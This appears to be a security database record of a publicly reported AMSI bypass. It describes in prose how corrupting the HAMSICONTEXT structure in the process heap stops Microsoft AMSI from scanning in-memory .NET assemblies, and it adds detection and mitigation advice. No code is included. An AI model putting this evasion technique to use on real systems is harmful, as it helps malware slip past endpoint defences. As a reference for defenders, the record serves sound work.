Bypass Record

AMSI Bypass × Microsoft AMSI

A publicly-reported instance of AMSI Bypass bypassing Microsoft AMSI, recorded with its original source. Factual record; no assessment of any specific deployment.

Product

Microsoft AMSI

Technique

AMSI Bypass

MITRE ATT&CK

T1562.001

Confidence

High

Severity

High

Status

poc

Disclosed

2026-01-10

Config / version noted

Not stated

Provenance

gist.github.com
disclosed 2026-01-10 · original source · via exa

Reported as

bypassing the Antimalware Scan Interface (AMSI) by corrupting the HAMSICONTEXT structure

Mechanism

The code walks the process heap to find the 'DotNet' string used by AMSI, then locates the adjacent HAMSICONTEXT pointer. It corrupts the HAMSICONTEXT by zeroing out the memory region, which causes AMSI to fail to scan content, effectively bypassing detection for in-memory .NET assembly loads.

Detection & mitigation

Monitor for suspicious heap manipulation via API calls like NtProtectVirtualMemory or WriteProcessMemory targeting AMSI-related structures, and deploy AMSI provider integrity checks or kernel callbacks to detect tampering. Mitigate by enabling Windows Defender Application Control (WDAC) and using endpoint detection that flags anomalous memory writes to security-critical heaps.

AMSI Bypass has also been recorded against

Any security vendor relying on AMSI CrowdStrike McAfee Palo Alto Networks SentinelOne Sophos Trellix

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.